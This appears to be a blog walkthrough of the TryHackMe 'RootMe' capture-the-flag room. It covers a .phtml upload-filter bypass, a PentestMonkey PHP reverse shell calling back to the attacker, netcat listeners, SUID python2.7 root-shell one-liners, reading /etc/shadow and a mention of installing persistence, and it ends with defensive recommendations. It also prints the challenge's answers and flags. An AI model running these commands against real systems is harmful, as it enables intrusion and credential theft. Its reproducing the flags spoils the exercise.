Back to Writeups

RootMe Walkthrough

Web Exploitation & Privilege Escalation

Published: September 28, 2025 Difficulty: Easy

RootMe is a beginner-friendly challenge on TryHackMe that focuses on web application exploitation through file upload vulnerabilities and privilege escalation using SUID binaries. Learn to bypass file upload restrictions and exploit Python SUID permissions.

Reconnaissance Phase

Network Scanning

Objective: Discover open ports and running services on the target machine.

Start with a service version scan using Nmap:

sudo nmap -sV <TARGET_IP>

For comprehensive scanning, use:

sudo nmap -sC -sV -oN detailed_scan.txt <TARGET_IP>

The scan reveals the following open ports:

  • Port 22 (SSH): OpenSSH 8.2p1 Ubuntu 4ubuntu0.13
  • Port 80 (HTTP): Apache httpd 2.4.41 (Ubuntu)

Initial Questions Answered:

🚩 Number of ports scanned: 2
🚩 Apache version: 2.4.41
🚩 Service on port 22: ssh

Key Learnings:

Limited attack surface with only SSH and HTTP services. The web application becomes the primary target for initial access since SSH typically requires credentials.

Web Directory Enumeration

Objective: Discover hidden directories and potential upload functionality.

Use Gobuster to enumerate web directories:

gobuster dir -u http://<TARGET_IP> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

Alternative with additional extensions:

gobuster dir -u http://<TARGET_IP> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt

Key directories discovered:

  • /uploads/ - File upload storage directory
  • /css/ - Stylesheet resources
  • /js/ - JavaScript resources
  • /panel/ - Admin/upload panel
🚩 Directory for file uploads: /panel/

Directory Analysis:

Navigate to http://<TARGET_IP>/panel/ to find a file upload interface. The presence of both /panel/ and /uploads/ suggests a file upload vulnerability.

Key Learnings:

File upload functionality combined with an uploads directory indicates potential for code execution via malicious file uploads. Always test upload restrictions and file execution capabilities.

File Upload Vulnerability Exploitation

Upload Restriction Analysis

Objective: Identify and bypass file upload restrictions to enable code execution.

Navigate to the upload panel at http://<TARGET_IP>/panel/ and test various file extensions:

Initial Testing:

Try uploading a simple PHP file with .php extension - this will likely be blocked.

Extension Bypass Techniques:

Common PHP extension bypasses to test:

  • .phtml - Alternative PHP extension
  • .php3 - Legacy PHP extension
  • .php4 - Legacy PHP extension
  • .php5 - Legacy PHP extension
  • .phps - PHP source code
  • .phar - PHP Archive

Based on the challenge notes, .phtml extension bypasses the restriction while .php is blocked.

Key Learnings:

File upload filters often use blacklists that can be bypassed with alternative extensions. Web servers may execute multiple PHP-related extensions, making extension-based filtering insufficient.

Reverse Shell Preparation

Objective: Prepare a PHP reverse shell payload for upload and execution.

Download the popular PentestMonkey PHP reverse shell:

wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

Alternatively, create your own reverse shell:

curl -O https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php

Shell Configuration:

Edit the reverse shell file to configure your settings:

nano php-reverse-shell.php

Modify the following lines:

  • IP Address: Change to your attacking machine's IP
  • Port: Change to desired listening port (e.g., 4444)
$ip = 'YOUR_IP_ADDRESS';  // Change this
$port = 4444;             // Change this

File Extension Modification:

Rename the file to use the .phtml extension:

mv php-reverse-shell.php reverse-shell.phtml

Key Learnings:

Reverse shells require proper configuration of IP addresses and ports. Using alternative extensions helps bypass basic upload filters while maintaining code execution capabilities.

Reverse Shell Execution

Netcat Listener Setup

Objective: Prepare to receive the reverse shell connection.

Set up a Netcat listener on your attacking machine:

nc -lvnp 4444

Explanation of flags:

  • -l: Listen mode
  • -v: Verbose output
  • -n: Don't resolve hostnames
  • -p 4444: Listen on port 4444

Alternative Listeners:

You can also use other listening tools:

# Using ncat (Nmap's netcat)
ncat -nlvp 4444

# Using socat
socat file:`tty`,raw,echo=0 tcp-listen:4444

Key Learnings:

Always set up your listener before triggering the reverse shell to avoid missing the connection. Netcat is the most commonly used tool for this purpose.

File Upload and Execution

Objective: Upload the reverse shell and trigger code execution.

Upload Process:

  1. Navigate to http://<TARGET_IP>/panel/
  2. Select your reverse-shell.phtml file
  3. Upload the file successfully

Shell Execution:

Navigate to the uploaded file to trigger execution:

http://<TARGET_IP>/uploads/reverse-shell.phtml

Check your Netcat listener for the incoming connection. You should receive a shell as the web server user (typically www-data).

Shell Stabilization:

Upgrade to a more stable shell:

# Python method
python3 -c 'import pty; pty.spawn("/bin/bash")'

# Alternative if python3 not available
python -c 'import pty; pty.spawn("/bin/bash")'

# Export shell variables
export TERM=xterm

# Background process and set raw terminal
# Press Ctrl+Z, then:
stty raw -echo; fg

Key Learnings:

File execution occurs when the web server processes the uploaded file. Shell stabilization improves usability and prevents accidental disconnections.

Initial System Reconnaissance

Objective: Gather system information and locate the user flag.

Basic system enumeration:

# Check current user and privileges
whoami
id

# System information
uname -a
cat /etc/os-release

# Network configuration
ip addr
ifconfig

User Flag Discovery:

Search for the user flag:

find / -name "user.txt" -print 2>/dev/null

Result: /var/www/user.txt

Read the user flag:

cat /var/www/user.txt
🚩 User Flag: THM{y0u_g0t_a_sh3ll}

Key Learnings:

Initial access often provides limited privileges. System enumeration helps identify escalation paths and locate important files like flags.

Privilege Escalation to Root

SUID Binary Enumeration

Objective: Identify SUID binaries that can be exploited for privilege escalation.

Search for SUID binaries across the system:

find / -perm -4000 2>/dev/null

Results include standard binaries and a notable finding:

  • /usr/lib/dbus-1.0/dbus-daemon-launch-helper
  • /usr/lib/snapd/snap-confine
  • /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
  • /usr/lib/eject/dmcrypt-get-device
  • /usr/lib/openssh/ssh-keysign
  • /usr/lib/policykit-1/polkit-agent-helper-1
  • /usr/bin/newuidmap
  • /usr/bin/newgidmap
  • /usr/bin/chsh
  • /usr/bin/python2.7 ← Key finding
  • /usr/bin/at
  • /usr/bin/chfn
  • /usr/bin/gpasswd
  • /usr/bin/sudo
  • /usr/bin/newgrp
  • /usr/bin/passwd
  • /usr/bin/pkexec

The critical finding is /usr/bin/python2.7 with SUID permissions, which is highly unusual and exploitable.

Key Learnings:

SUID binaries run with the permissions of their owner (often root). Python with SUID permissions is extremely dangerous as it allows arbitrary code execution with elevated privileges.

Python SUID Exploitation

Objective: Exploit the Python SUID binary to gain root access and retrieve the final flag.

GTFOBins Research:

Consult GTFOBins for Python privilege escalation techniques.

Direct File Access Method:

Use Python to directly read the root flag:

python2.7 -c 'print(open("/root/root.txt").read())'
🚩 Root Flag: THM{pr1v1l3g3_3sc4l4t10n}

Alternative Exploitation Methods:

Spawn a root shell:

# Method 1: Direct shell spawn
python2.7 -c 'import os; os.execl("/bin/sh", "sh", "-p")'

# Method 2: System command execution
python2.7 -c 'import os; os.system("/bin/bash -p")'

# Method 3: Using subprocess
python2.7 -c 'import subprocess; subprocess.call(["/bin/bash", "-p"])'

Root Shell Verification:

Once you have a root shell, verify your privileges:

whoami
id
cat /etc/shadow

Additional Root Activities:

With root access, you can:

  • Read all system files: cat /etc/shadow
  • Access all user directories: ls -la /root/
  • View system logs: tail -f /var/log/auth.log
  • Install persistence mechanisms

Key Learnings:

SUID Python is one of the most dangerous misconfigurations as it provides immediate root access through various methods. GTFOBins is an excellent resource for exploitation techniques.

Challenge Summary

Complete Attack Chain

Full Exploitation Path:

  1. Reconnaissance: Nmap scan revealed web application on Apache
  2. Directory Enumeration: Discovered upload panel and storage directory
  3. Upload Restriction Bypass: Used .phtml extension to bypass .php filter
  4. Code Execution: Uploaded PHP reverse shell for initial access
  5. System Enumeration: Located user flag and identified SUID binaries
  6. Privilege Escalation: Exploited Python SUID for root access

Flags Captured:

Reconnaissance Answers:
• Number of open ports: 2
• Apache version: 2.4.41
• Service on port 22: ssh
• Upload directory: /panel/

🚩 User Flag: THM{y0u_g0t_a_sh3ll}
🚩 Root Flag: THM{pr1v1l3g3_3sc4l4t10n}

Technical Skills Demonstrated:

  • Network reconnaissance and service enumeration
  • Web directory enumeration and discovery
  • File upload vulnerability identification and exploitation
  • Extension-based filter bypass techniques
  • PHP reverse shell deployment and configuration
  • Shell stabilization and upgrade techniques
  • SUID binary enumeration and exploitation
  • Python privilege escalation techniques

Tools and Techniques Used:

  • Nmap: Network scanning and service detection
  • Gobuster: Web directory and file enumeration
  • PHP Reverse Shell: Remote code execution payload
  • Netcat: Reverse shell listener and network utility
  • Find: File and SUID binary discovery
  • Python: SUID privilege escalation and file access
  • GTFOBins: Exploitation technique reference

Vulnerabilities Identified:

  • Insecure File Upload: Insufficient extension filtering
  • Code Execution: Server executes uploaded PHP files
  • SUID Misconfiguration: Python interpreter with elevated privileges
  • Directory Listing: Upload directory accessible
  • Weak Input Validation: Extension-based filtering only

Defensive Recommendations:

  • File Upload Security: Implement content-based validation, not just extension checking
  • Execution Prevention: Store uploads outside web root or disable execution
  • SUID Auditing: Regular review and removal of unnecessary SUID binaries
  • Web Server Configuration: Disable execution of uploaded files
  • Input Validation: Use whitelist approach instead of blacklist
  • Principle of Least Privilege: Run services with minimal required permissions
  • Security Headers: Implement appropriate HTTP security headers

Real-World Implications:

This challenge demonstrates common vulnerabilities in web applications:

  • File upload vulnerabilities are frequently found in content management systems
  • SUID misconfigurations are critical system administration errors
  • Extension-based filtering is insufficient for security
  • Default configurations often lack proper security controls
  • Layered security approaches are necessary for effective protection